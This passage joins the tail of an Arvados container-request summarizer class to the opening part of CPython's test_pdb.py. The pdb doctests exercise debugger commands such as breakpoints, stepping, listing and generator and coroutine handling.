super(PipelineSummarizer, self).__init__(
children=children,
label=instance['uuid'],
**kwargs)
class ContainerRequestTreeSummarizer(MultiSummarizer):
def __init__(self, root, skip_child_jobs=False, **kwargs):
arv = arvados.api('v1', model=OrderedJsonModel())
label = kwargs.pop('label', None) or root.get('name') or root['uuid']
root['name'] = label
children = collections.OrderedDict()
todo = collections.deque((root, ))
while len(todo) > 0:
current = todo.popleft()
label = current['name']
sort_key = current['created_at']
summer = ContainerRequestSummarizer(current, label=label, **kwargs)
summer.sort_key = sort_key
children[current['uuid']] = summer
page_filters = []
while True:
child_crs = arv.container_requests().index(
order=['uuid asc'],
filters=page_filters+[
['requesting_container_uuid', '=', current['container_uuid']]],
).execute()
if not child_crs['items']:
break
elif skip_child_jobs:
logger.warning('%s: omitting stats from %d child containers'
' because --skip-child-jobs flag is on',
label, child_crs['items_available'])
break
page_filters = [['uuid', '>', child_crs['items'][-1]['uuid']]]
for cr in child_crs['items']:
if cr['container_uuid']:
logger.debug('%s: container req %s', current['uuid'], cr['uuid'])
cr['name'] = cr.get('name') or cr['uuid']
todo.append(cr)
sorted_children = collections.OrderedDict()
for uuid in sorted(list(children.keys()), key=lambda uuid: children[uuid].sort_key):
sorted_children[uuid] = children[uuid]
super(ContainerRequestTreeSummarizer, self).__init__(
children=sorted_children,
label=root['name'],
**kwargs)
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test.support import os_helper
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def reset_Breakpoint():
import bdb
bdb.Breakpoint.clearBreakpoints()
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def test_pdb_breakpoints_preserved_across_interactive_sessions():
"""Breakpoints are remembered between interactive sessions
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'import test.test_pdb',
... 'break test.test_pdb.do_something',
... 'break test.test_pdb.do_nothing',
... 'break',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) import test.test_pdb
(Pdb) break test.test_pdb.do_something
Breakpoint 1 at ...test_pdb.py:...
(Pdb) break test.test_pdb.do_nothing
Breakpoint 2 at ...test_pdb.py:...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'break pdb.find_function',
... 'break',
... 'clear 1',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) break pdb.find_function
Breakpoint 3 at ...pdb.py:94
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 1
Deleted breakpoint 1 at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'clear 2',
... 'clear 3',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 2
Deleted breakpoint 2 at ...test_pdb.py:...
(Pdb) clear 3
Deleted breakpoint 3 at ...pdb.py:...
(Pdb) continue
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
